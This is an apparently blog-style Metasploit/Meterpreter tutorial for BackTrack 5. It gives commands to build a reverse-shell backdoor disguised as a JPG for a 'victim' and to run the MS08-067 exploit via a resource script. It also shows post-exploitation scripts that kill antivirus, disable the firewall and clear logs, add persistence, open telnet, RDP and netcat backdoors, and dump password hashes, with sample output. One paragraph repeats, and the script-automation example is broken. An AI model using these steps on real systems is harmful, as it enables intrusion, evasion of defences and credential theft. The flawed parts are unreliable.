Metasploit Meterpreter Scripting Backtrack 5 Tutorial
Information security is a broad field and it involves the penetration testing and computer forensic as well, there are so many tools are available to perform the penetration testing on the target, Metasploit is one of the best tool among them. Meterpreter is a powerful feature of metasploit that uses DLL injection to communicate over the socket. Meterpreter works on the client-side by providing a powerful environment to communicate, to transfer files.
A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:
A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:
- Capture the screen
- Keylogging
- File transfer
- Service detection and more
Even with numerous meterpreter scripts available, you are free to write and to create your own script that is best suited to your work. Some important aspects about the meterpreter script would be:
- Written in Ruby programming language
- Located in the metasploit directory
- Meterpreter scripts are creating everyday by different authors click here to check the list.
- Meterpreter scripts are very helpful to automate the process after compromising the host
- Meterpreter scripts are based on API and you can get more information here.
There are so many meterpreter scripts that are available publicly for you to use, but if you want to create a new meterpreter script of your own and for public usage, this is readily doable. All you need to do is to follow some rules and regulations so that your script does not conflict with the standard variables. Ruby programming language is a basic need in order to write a script for meterpreter. Other important rules to follow are:
- Always use description so that the others will understand it
- Use local variable not global variable
- Always provide help option for better usage
- Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities
Let us consider an example: in our scenario, we need to create an infected file (a backdoor) so that we can send it to the victim. Metasploit needn’t be that big of a deal; you can even create a backdoor by using fast-track.
root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
As we have typed all the things in, we can automate the process by creating a new script:
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#
The result is the same. It is also possible to create a jpg file but that method is fast. Since the time-consuming method is repeating the same step, why not create a script for that to do all these jobs automatically? There are different meterpreter scripts are available; just look at the picture below.
This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:
root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc
Beyond this, if we use the manual technique to do then job, then we will need to define:
- The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
- We need to set the remote host manually
- We need to set local host and port manually
After the execution, the meterpreter session must be active if and only if the operating system is vulnerable, such as in this case:
Now in this meterpreter session, we are able to call different scripts. We can also create our own script as well, as discussed above. Below, I will show you some of the best meterpreter scripts. These are highly useful in the process of penetration testing; however, developers are refining these scripts daily, so be active in the community and on different blogs and forums to keep yourself updated.
Screenspy Script
This is the basic script that will capture the screen of the victim’s computer. All you need to do is type in “run screenspy.” To get help of usage, just type in “run screenspy -h” on the meterpreter screen. After the execution, Firefox will open with a picture of the victim’s computer at that moment.
KillAv Script
Killav script is a pretty famous script. As the name suggests, it will kill (close) antivirus softwares, so if you don’t want that antivirus’ software to disturb you, be sure to kill all of these antivirus softwares by using this script:
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >
Killav contains the information on most of the better known anti-virus’s, but if there is a new anti-virus, then you will need to edit this script for the best performance. As before with the script file, we can find the famous anti-virus exe name:
- winppr32.exe
- winrecon.exe
- winservn.exe
- winssk32.exe
- winstart.exe
- winstart001.exe
- wintsk32.exe
- winupdate.exe
- wkufind.exe
- wnad.exe
- wnt.exe
- wradmin.exe
- wrctrl.exe
- wsbgate.exe
- wupdater.exe
- wupdt.exe
- wyvernworksfirewall.exe
- xpf202en.exe
- zapro.exe
- zapsetup3001.exe
- zatutor.exe
- zonalm2601.exe
- zonealarm.exe
Getcountermeasure Script
Killav is a power script and it can kill a lot of different anti-virus’s, but the problem is that when you implement killav, windows may show some types of errors and other alerts, not to mention firewalls. This is remedied by a wonderful script called Getcountermeasure:
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.
Gettelnet script
Telnet is one of the most famous services on the windows operating system. It will allow a remote connection, so if you want to open telnet on the victim’s computer for future use, then it is a good script to use. However, as an advance we can use SSH service for remote connection. We can also install netcat as a backdoor on a compromised host for future connections. Use this command to get more help
meterpreter > gettelnet -h
There are a lot of different scripts are available but here we will discuss only the most important ones. These will help you to understand the network as well as help you for future connections:
Net Enum- Network Enumeration Script
Netenum is a network enumeration script that is a wonderful script for:
- Domain Name for DNS Forward Lookup
- To Perform DNS Forward Lookup on host list and domain
- The target address range or CIDR identifier
- To Perform DNS lookup of MX and NS records for a domain
- To Perform Service Record DNS lookup for a domain
- To Perform Ping Sweep on IP Range
Checkvm- Check Virtual Machine
Virtual machines are now an important part of enterprise network and most of the large (and even small) networks are using them. Checkvm is a script that will let you monitor the status of the victim, whether on virtual machine or not. It will also let you see the type of virtual machine. Here is the output of this case:
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >
Virus Scan Bypass
Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder, adds it to exclusion list and sets it to run at startup. Though we have discussed two scripts that kill anti-virus protections, it is good to run different scripts to verify your attack.
meterpreter > run virusscan_bypass -h
Enable RDP- Getgui
If you want a graphical user interface of the victim’s computer, then you need to open a service called RDP (remote desktop protocol):
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
Hashdump
Last but not the least: I really don’t want to end this article without sharing hashdump, in case you want to secure password hashes from the victim for future use. In some cases, these hashes works on other platforms:
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
If you have some other wonderful scripts, please share with in the comments!
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.